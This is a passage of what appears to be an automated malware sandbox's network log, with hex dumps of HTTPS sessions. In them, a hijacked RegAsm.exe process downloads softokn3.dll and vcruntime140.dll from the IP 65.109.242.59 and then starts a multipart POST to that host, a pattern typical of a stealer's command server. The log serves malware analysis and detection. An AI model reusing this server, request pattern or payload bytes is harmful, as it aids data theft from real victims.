                                                                                  Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                  Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                  Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                  Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                  2024-05-24 15:47:18 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                  Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.64973265.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:20 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:21 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:20 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 257872
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-3ef50"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:21 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                  Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                  Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                  Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                  Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                  Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                  Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                  Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                  Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                  2024-05-24 15:47:21 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                  Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.64973365.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:22 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:22 UTC245INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:22 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 80880
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-13bf0"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:22 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                  2024-05-24 15:47:22 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                                  Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                                  2024-05-24 15:47:22 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                                  Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                                  2024-05-24 15:47:22 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                                  Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                                  2024-05-24 15:47:22 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                                  Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.64973465.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:23 UTC279OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 1025
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
